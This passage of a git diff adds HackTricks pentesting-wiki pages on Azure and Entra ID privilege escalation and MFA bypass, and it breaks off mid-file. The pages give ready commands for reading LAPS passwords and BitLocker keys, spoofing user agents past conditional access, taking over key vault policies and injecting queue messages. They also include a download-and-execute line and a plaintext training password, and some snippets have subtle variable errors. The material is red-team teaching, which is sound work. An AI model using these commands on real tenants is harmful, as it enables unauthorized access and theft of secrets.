+This privilege allows to modify properties of the user. It's common to find dynamic groups that add users based on properties values, therefore, this permission could allow a user to set the needed property value to be a member to a specific dynamic group and escalate privileges.
+
+{% code overflow="wrap" %}
+```bash
+#e.g. change manager of a user
+victimUser="<userID>"
+managerUser="<userID>"
+az rest --method PUT \
+  --uri "https://graph.microsoft.com/v1.0/users/$managerUser/manager/\$ref" \
+  --headers "Content-Type=application/json" \
+  --body '{"@odata.id": "https://graph.microsoft.com/v1.0/users/$managerUser"}'
+  
+#e.g. change department of a user
+az rest --method PATCH \
+  --uri "https://graph.microsoft.com/v1.0/users/$victimUser" \
+  --headers "Content-Type=application/json" \
+  --body "{\"department\": \"security\"}"
+```
+{% endcode %}
+
+## Conditional Access Policies & MFA bypass
+
+Misconfigured conditional access policies requiring MFA could be bypassed, check:
+
+{% content-ref url="az-conditional-access-policies-mfa-bypass.md" %}
+[az-conditional-access-policies-mfa-bypass.md](az-conditional-access-policies-mfa-bypass.md)
+{% endcontent-ref %}
+
+## Devices
+
+### `microsoft.directory/devices/registeredOwners/update`
+
+This permission allows attackers to assigning themselves as owners of devices to gain control or access to device-specific settings and data.
+
+```bash
+deviceId="<deviceId>"
+userId="<userId>"
+az rest --method POST \
+  --uri "https://graph.microsoft.com/v1.0/devices/$deviceId/owners/\$ref" \
+  --headers "Content-Type=application/json" \
+  --body '{"@odata.id": "https://graph.microsoft.com/v1.0/directoryObjects/$userId"}'
+```
+
+### `microsoft.directory/devices/registeredUsers/update`
+
+This permission allows attackers to associate their account with devices to gain access or to bypass security policies.
+
+```bash
+deviceId="<deviceId>"
+userId="<userId>"
+az rest --method POST \
+  --uri "https://graph.microsoft.com/v1.0/devices/$deviceId/registeredUsers/\$ref" \
+  --headers "Content-Type=application/json" \
+  --body '{"@odata.id": "https://graph.microsoft.com/v1.0/directoryObjects/$userId"}'
+```
+
+### `microsoft.directory/deviceLocalCredentials/password/read`
+
+This permission allows attackers to read the properties of the backed up local administrator account credentials for Microsoft Entra joined devices, including the password
+
+{% code overflow="wrap" %}
+```bash
+# List deviceLocalCredentials 
+az rest --method GET \
+  --uri "https://graph.microsoft.com/v1.0/directory/deviceLocalCredentials"
+
+# Get credentials
+deviceLC="<deviceLCID>"
+az rest --method GET \
+  --uri "https://graph.microsoft.com/v1.0/directory/deviceLocalCredentials/$deviceLCID?\$select=credentials" \
+```
+{% endcode %}
+
+## BitlockerKeys
+
+### `microsoft.directory/bitlockerKeys/key/read`
+
+This permission allows to access BitLocker keys, which could allow an attacker to decrypt drives, compromising data confidentiality.
+
+{% code overflow="wrap" %}
+```bash
+# List recovery keys
+az rest --method GET \
+  --uri "https://graph.microsoft.com/v1.0/informationProtection/bitlocker/recoveryKeys"
+
+# Get key
+recoveryKeyId="<recoveryKeyId>"
+az rest --method GET \
+  --uri "https://graph.microsoft.com/v1.0/informationProtection/bitlocker/recoveryKeys/$recoveryKeyId?\$select=key"
+```
+{% endcode %}
+
+## Other Interesting permissions (TODO)
+
+* `microsoft.directory/applications/permissions/update`
+* `microsoft.directory/servicePrincipals/permissions/update`
+* `microsoft.directory/applications.myOrganization/allProperties/update`
+* `microsoft.directory/applications/allProperties/update`
+* `microsoft.directory/servicePrincipals/appRoleAssignedTo/update`
+* `microsoft.directory/applications/appRoles/update`
+* `microsoft.directory/applications.myOrganization/permissions/update`
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.md b/pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.md
new file mode 100644
index 0000000000..c58c50947e
--- /dev/null
+++ b/pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.md
@@ -0,0 +1,213 @@
+# Az - Conditional Access Policies & MFA Bypass
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Basic Information
+
+Azure Conditional Access policies are rules set up in Microsoft Azure to enforce access controls to Azure services and applications based on certain **conditions**. These policies help organizations secure their resources by applying the right access controls under the right circumstances.\
+Conditional access policies basically **defines** **Who** can access **What** from **Where** and **How**.
+
+Here are a couple of examples:
+
+1. **Sign-In Risk Policy**: This policy could be set to require multi-factor authentication (MFA) when a sign-in risk is detected. For example, if a user's login behavior is unusual compared to their regular pattern, such as logging in from a different country, the system can prompt for additional authentication.
+2. **Device Compliance Policy**: This policy can restrict access to Azure services only to devices that are compliant with the organization's security standards. For instance, access could be allowed only from devices that have up-to-date antivirus software or are running a certain operating system version.
+
+## Conditional Acces Policies Bypasses
+
+It's possible that a conditional access policy is **checking some information that can be easily tampered allowing a bypass of the policy**. And if for example the policy was configuring MFA, the attacker will be able to bypass it.
+
+When configuring a conditional access policy it's needed to indicate the **users** affected and **target resources** (like all cloud apps).
+
+It's also needed to configure the **conditions** that will **trigger** the policy:
+
+* **Network**: Ip, IP ranges and geographical locations
+  * Can be bypassed using a VPN or Proxy to connect to a country or managing to login from an allowed IP address
+* **Microsoft risks**: User risk, Sign-in risk, Insider risk
+* **Device platforms**: Any device or select Android, iOS, Windows phone, Windows, macOS, Linux
+  * If “Any device” is not selected but all the other options are selected it’s possible to bypass it using a random user-agent not related to those platforms
+* **Client apps**: Option are “Browser”, “Mobiles apps and desktop clients”, “Exchange ActiveSync clients” and Other clients”
+  * To bypass login with a not selected option
+* **Filter for devices**: It’s possible to generate a rule related the used device
+* A**uthentication flows**: Options are “Device code flow” and “Authentication transfer”
+  * This won’t affect an attacker unless he is trying to abuse any of those protocols in a phishing attempt to access the victims account
+
+The possible **results** are: Block or Grant access with potential conditions like require MFA, device to be compliant…
+
+### Device Platforms - Device Condition
+
+It's possible to set a condition based on the **device platform** (Android, iOS, Windows, macOS...), however, this is based on the **user-agent** so it's easy to bypass. Even **making all the options enforce MFA**, if you use a **user-agent that it isn't recognized,** you will be able to bypass the MFA or block:
+
+<figure><img src="../../../../.gitbook/assets/image (352).png" alt=""><figcaption></figcaption></figure>
+
+Just making the browser **send an unknown user-agent** (like `Mozilla/5.0 (compatible; MSIE 10.0; Windows Phone 8.0; Trident/6.0; IEMobile/10.0; ARM; Touch; NOKIA; Lumia 920) UCBrowser/10.1.0.563 Mobile`) is enough to not trigger this condition.\
+You can change the user agent **manually** in the developer tools:
+
+<figure><img src="../../../../.gitbook/assets/image (351).png" alt="" width="375"><figcaption></figcaption></figure>
+
+&#x20;Or use a [browser extension like this one](https://chromewebstore.google.com/detail/user-agent-switcher-and-m/bhchdcejhohfmigjafbampogmaanbfkg?hl=en).
+
+### Locations: Countries, IP ranges - Device Condition
+
+If this is set in the conditional policy, an attacker could just use a **VPN** in the **allowed country** or try to find a way to access from an **allowed IP address** to bypass these conditions.
+
+### Cloud Apps
+
+It's possible to configure **conditional access policies to block or force** for example MFA when a user tries to access **specific app**:
+
+<figure><img src="../../../../.gitbook/assets/image (353).png" alt=""><figcaption></figcaption></figure>
+
+To try to bypass this protection you should see if you can **only into any application**.\
+The tool [**AzureAppsSweep**](https://github.com/carlospolop/AzureAppsSweep) has **tens of application IDs hardcoded** and will try to login into them and let you know and even give you the token if successful.
+
+In order to **test specific application IDs in specific resources** you could also use a tool such as:
+
+{% code overflow="wrap" %}
+```bash
+roadrecon auth -u user@email.com -r https://outlook.office.com/ -c 1fec8e78-bce4-4aaf-ab1b-5451cc387264 --tokens-stdout
+
+<token>
+```
+{% endcode %}
+
+Moreover, it's also possible to protect the login method (e.g. if you are trying to login from the browser or from a desktop application). The tool [**Invoke-MFASweep**](az-conditional-access-policies-mfa-bypass.md#invoke-mfasweep) perform some checks to try to bypass this protections also.
+
+The tool [**donkeytoken**](az-conditional-access-policies-mfa-bypass.md#donkeytoken) could also be used to similar purposes although it looks unmantained.
+
+The tool [**ROPCI**](https://github.com/wunderwuzzi23/ropci) can also be used to test this protections and see if it's possible to bypass MFAs or blocks, but this tool works from a **whitebox** perspective. You first need to download the list of Apps allowed in the tenant and then it will try to login into them.
+
+## Other Az MFA Bypasses
+
+### Ring tone
+
+One Azure MFA option is to **receive a call in the configured phone number** where it will be asked the user to **send the char `#`**.
+
+{% hint style="danger" %}
+As chars are just **tones**, an attacker could **compromise** the **voicemail** message of the phone number, configure as the message the **tone of `#`** and then, when requesting the MFA make sure that the **victims phone is busy** (calling it) so the Azure call gets redirected to the voice mail.
+{% endhint %}
+
+### Compliant Devices
+
+Policies often asks for a compliant device or MFA, so an **attacker could register a compliant device**, get a **PRT** token and **bypass this way the MFA**.
+
+Start by registering a **compliant device in Intune**, then **get the PRT** with:
+
+```powershell
+$prtKeys = Get-AADIntuneUserPRTKeys - PfxFileName .\<uuid>.pfx -Credentials $credentials
+
+$prtToken = New-AADIntUserPRTToken -Settings $prtKeys -GertNonce
+
+Get-AADIntAccessTokenForAADGraph -PRTToken $prtToken
+
+<token returned>
+```
+
+Find more information about this kind of attack in the following page:
+
+{% content-ref url="../../az-lateral-movement-cloud-on-prem/pass-the-prt.md" %}
+[pass-the-prt.md](../../az-lateral-movement-cloud-on-prem/pass-the-prt.md)
+{% endcontent-ref %}
+
+## Tooling
+
+### [**AzureAppsSweep**](https://github.com/carlospolop/AzureAppsSweep)
+
+This script get some user credentials and check if it can login in some applications.
+
+This is useful to see if you **aren't required MFA to login in some applications** that you might later abuse to **escalate pvivileges**.
+
+### [roadrecon](https://github.com/dirkjanm/ROADtools)
+
+Get all the policies
+
+```bash
+roadrecon plugin policies
+```
+
+### [Invoke-MFASweep](https://github.com/dafthack/MFASweep)
+
+MFASweep is a PowerShell script that attempts to **log in to various Microsoft services using a provided set of credentials and will attempt to identify if MFA is enabled**. Depending on how conditional access policies and other multi-factor authentication settings are configured some protocols may end up being left single factor. It also has an additional check for ADFS configurations and can attempt to log in to the on-prem ADFS server if detected.
+
+```bash
+Invoke-Expression (Invoke-WebRequest -Uri "https://raw.githubusercontent.com/dafthack/MFASweep/master/MFASweep.ps1").Content
+Invoke-MFASweep -Username <username> -Password <pass>
+```
+
+### [ROPCI](https://github.com/wunderwuzzi23/ropci)
+
+This tool has helped identify MFA bypasses and then abuse APIs in multiple production AAD tenants, where AAD customers believed they had MFA enforced, but ROPC based authentication succeeded.
+
+{% hint style="success" %}
+You need to have permissions to list all the applications to be able to generate the list of the apps to brute-force.
+{% endhint %}
+
+```bash
+./ropci configure
+./ropci apps list --all --format json -o apps.json
+./ropci apps list --all --format json | jq -r '.value[] | [.displayName,.appId] | @csv' > apps.csv
+./ropci auth bulk -i apps.csv -o results.json
+```
+
+### [donkeytoken](https://github.com/silverhack/donkeytoken)
+
+Donkey token is a set of functions which aim to help security consultants who need to validate Conditional Access Policies, tests for 2FA-enabled Microsoft portals, etc..
+
+<pre class="language-powershell"><code class="lang-powershell"><strong>git clone https://github.com/silverhack/donkeytoken.git
+</strong><strong>Import-Module '.\donkeytoken' -Force
+</strong></code></pre>
+
+**Test each portal** if it's possible to **login without MFA**:
+
+```powershell
+$username = "conditional-access-app-user@azure.training.hacktricks.xyz"
+$password = ConvertTo-SecureString "Poehurgi78633" -AsPlainText -Force
+$cred = New-Object System.Management.Automation.PSCredential($username, $password)
+Invoke-MFATest -credential $cred -Verbose -Debug -InformationAction Continue
+```
+
+Because the **Azure** **portal** is **not constrained** it's possible to **gather a token from the portal endpoint to access any service detected** by the previous execution. In this case Sharepoint was identified, and a token to access it is requested:
+
+{% code overflow="wrap" %}
+```powershell
+$token = Get-DelegationTokenFromAzurePortal -credential $cred -token_type microsoft.graph -extension_type Microsoft_Intune
+Read-JWTtoken -token $token.access_token
+```
+{% endcode %}
+
+Supposing the token has the permission Sites.Read.All (from Sharepoint), even if you cannot access Sharepoint from the web because of MFA, it's possible to use the token to access the files with the generated token:
+
+```powershell
+$data = Get-SharePointFilesFromGraph -authentication $token $data[0].downloadUrl
+```
+
+## References
+
+* [https://www.youtube.com/watch?v=yOJ6yB9anZM\&t=296s](https://www.youtube.com/watch?v=yOJ6yB9anZM\&t=296s)
+* [https://www.youtube.com/watch?v=xei8lAPitX8](https://www.youtube.com/watch?v=xei8lAPitX8)
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/dynamic-groups.md b/pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/dynamic-groups.md
new file mode 100644
index 0000000000..9b72dba495
--- /dev/null
+++ b/pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/dynamic-groups.md
@@ -0,0 +1,78 @@
+# Az - Dynamic Groups Privesc
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Basic Information
+
+**Dynamic groups** are groups that has a set of **rules** configured and all the **users or devices** that match the rules are added to the group. Every time a user or device **attribute** is **changed**, dynamic rules are **rechecked**. And when a **new rule** is **created** all devices and users are **checked**.
+
+Dynamic groups can have **Azure RBAC roles assigned** to them, but it's **not possible** to add **AzureAD roles** to dynamic groups.
+
+This feature requires Azure AD premium P1 license.
+
+## Privesc
+
+Note that by default any user can invite guests in Azure AD, so, If a dynamic group **rule** gives **permissions** to users based on **attributes** that can be **set** in a new **guest**, it's possible to **create a guest** with this attributes and **escalate privileges**. It's also possible for a guest to manage his own profile and change these attributes.
+
+Get groups that allow Dynamic membership: **`az ad group list --query "[?contains(groupTypes, 'DynamicMembership')]" --output table`**
+
+### Example
+
+* **Rule example**: `(user.otherMails -any (_ -contains "security")) -and (user.userType -eq "guest")`
+* **Rule description**: Any Guest user with a secondary email with the string 'security' will be added to the group
+
+For the Guest user email, accept the invitation and check the current settings of **that user** in [https://entra.microsoft.com/#view/Microsoft\_AAD\_IAM/TenantOverview.ReactView](https://entra.microsoft.com/#view/Microsoft_AAD_IAM/TenantOverview.ReactView).\
+Unfortunately the page doesn't allow to modify the attribute values so we need to use the API:
+
+{% code overflow="wrap" %}
+```powershell
+# Login with the gust user
+az login --allow-no-subscriptions
+
+# Get user object ID
+az ad signed-in-user show
+
+# Update otherMails
+az rest --method PATCH \
+  --url "https://graph.microsoft.com/v1.0/users/<user-object-id>" \
+  --headers 'Content-Type=application/json' \
+  --body '{"otherMails": ["newemail@example.com", "anotheremail@example.com"]}'
+
+# Verify the update
+az rest --method GET \
+  --url "https://graph.microsoft.com/v1.0/users/<user-object-id>" \
+  --query "otherMails"
+```
+{% endcode %}
+
+## References
+
+* [https://www.mnemonic.io/resources/blog/abusing-dynamic-groups-in-azure-ad-for-privilege-escalation/](https://www.mnemonic.io/resources/blog/abusing-dynamic-groups-in-azure-ad-for-privilege-escalation/)
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/azure-security/az-privilege-escalation/az-key-vault-privesc.md b/pentesting-cloud/azure-security/az-privilege-escalation/az-key-vault-privesc.md
new file mode 100644
index 0000000000..200b90d6d6
--- /dev/null
+++ b/pentesting-cloud/azure-security/az-privilege-escalation/az-key-vault-privesc.md
@@ -0,0 +1,60 @@
+# Az - Key Vault Privesc
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Azure Key Vault
+
+For more information about this service check:
+
+{% content-ref url="../az-services/keyvault.md" %}
+[keyvault.md](../az-services/keyvault.md)
+{% endcontent-ref %}
+
+### Microsoft.KeyVault/vaults/write
+
+An attacker with this permission will be able to modify the policy of a key vault (the key vault must be using access policies instead of RBAC).
+
+```bash
+# If access policies in the output, then you can abuse it
+az keyvault show --name <vault-name>
+
+# Get current principal ID
+az ad signed-in-user show --query id --output tsv
+
+# Assign all permissions
+az keyvault set-policy \
+  --name <vault-name> \
+  --object-id <your-object-id> \
+  --key-permissions all \
+  --secret-permissions all \
+  --certificate-permissions all \
+  --storage-permissions all
+```
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/azure-security/az-privilege-escalation/az-queue-privesc.md b/pentesting-cloud/azure-security/az-privilege-escalation/az-queue-privesc.md
new file mode 100644
index 0000000000..0d92f6fcac
--- /dev/null
+++ b/pentesting-cloud/azure-security/az-privilege-escalation/az-queue-privesc.md
@@ -0,0 +1,109 @@
+# Az - Queue Storage Privesc
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Queue
+
+For more information check:
+
+{% content-ref url="../az-services/az-queue-enum.md" %}
+[az-queue-enum.md](../az-services/az-queue-enum.md)
+{% endcontent-ref %}
+
+### DataActions: `Microsoft.Storage/storageAccounts/queueServices/queues/messages/read`
+
+An attacker with this permission can peek messages from an Azure Storage Queue. This allows the attacker to view the content of messages without marking them as processed or altering their state. This could lead to unauthorized access to sensitive information, enabling data exfiltration or gathering intelligence for further attacks.
+
+{% code overflow="wrap" %}
+```bash
+az storage message peek --queue-name <queue_name> --account-name <storage_account>
+```
+{% endcode %}
+
+**Potential Impact**: Unauthorized access to the queue, message exposure, or queue manipulation by unauthorized users or services.
+
+### DataActions: `Microsoft.Storage/storageAccounts/queueServices/queues/messages/process/action`
+
+With this permission, an attacker can retrieve and process messages from an Azure Storage Queue. This means they can read the message content and mark it as processed, effectively hiding it from legitimate systems. This could lead to sensitive data being exposed, disruptions in how messages are handled, or even stopping important workflows by making messages unavailable to their intended users.
+
+{% code overflow="wrap" %}
+```bash
+az storage message get --queue-name <queue_name> --account-name <storage_account>
+```
+{% endcode %}
+
+### DataActions: `Microsoft.Storage/storageAccounts/queueServices/queues/messages/add/action`
+
+With this permission, an attacker can add new messages to an Azure Storage Queue. This allows them to inject malicious or unauthorized data into the queue, potentially triggering unintended actions or disrupting downstream services that process the messages.
+
+{% code overflow="wrap" %}
+```bash
+az storage message put --queue-name <queue-name> --content "Injected malicious message" --account-name <storage-account>
+```
+{% endcode %}
+
+### DataActions: `Microsoft.Storage/storageAccounts/queueServices/queues/messages/write`
+
+This permission allows an attacker to add new messages or update existing ones in an Azure Storage Queue. By using this, they could insert harmful content or alter existing messages, potentially misleading applications or causing undesired behaviors in systems that rely on the queue.
+
+{% code overflow="wrap" %}
+```bash
+az storage message put --queue-name <queue-name> --content "Injected malicious message" --account-name <storage-account>
+
+#Update the message
+az storage message update --queue-name <queue-name> \
+    --id <message-id> \
+    --pop-receipt <pop-receipt> \
+    --content "Updated message content" \
+    --visibility-timeout <timeout-in-seconds> \
+    --account-name <storage-account>
+```
+{% endcode %}
+
+### Action: `Microsoft.Storage/storageAccounts/queueServices/queues/write`
+
+This permission allows an attacker to create or modify queues and their properties within the storage account. It can be used to create unauthorized queues, modify metadata, or change access control lists (ACLs) to grant or restrict access. This capability could disrupt workflows, inject malicious data, exfiltrate sensitive information, or manipulate queue settings to enable further attacks.
+
+{% code overflow="wrap" %}
+```bash
+az storage queue create --name <new-queue-name> --account-name <storage-account>
+
+az storage queue metadata update --name <queue-name> --metadata key1=value1 key2=value2 --account-name <storage-account>
+
+az storage queue policy set --name <queue-name> --permissions rwd --expiry 2024-12-31T23:59:59Z --account-name <storage-account>
+```
+{% endcode %}
+
+## References
+
+* https://learn.microsoft.com/en-us/azure/storage/queues/storage-powershell-how-to-use-queues
+* https://learn.microsoft.com/en-us/rest/api/storageservices/queue-service-rest-api
+* https://learn.microsoft.com/en-us/azure/storage/queues/queues-auth-abac-attributes
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/azure-security/az-privilege-escalation/az-servicebus-privesc.md b/pentesting-cloud/azure-security/az-privilege-escalation/az-servicebus-privesc.md
new file mode 100644
index 0000000000..ce5248f01b
--- /dev/null
+++ b/pentesting-cloud/azure-security/az-privilege-escalation/az-servicebus-privesc.md
@@ -0,0 +1,177 @@
+# Az - Service Bus Privesc
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../.gitbook/assets/image (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../.gitbook/assets/image (1) (1).png" alt="" data-size="line">\
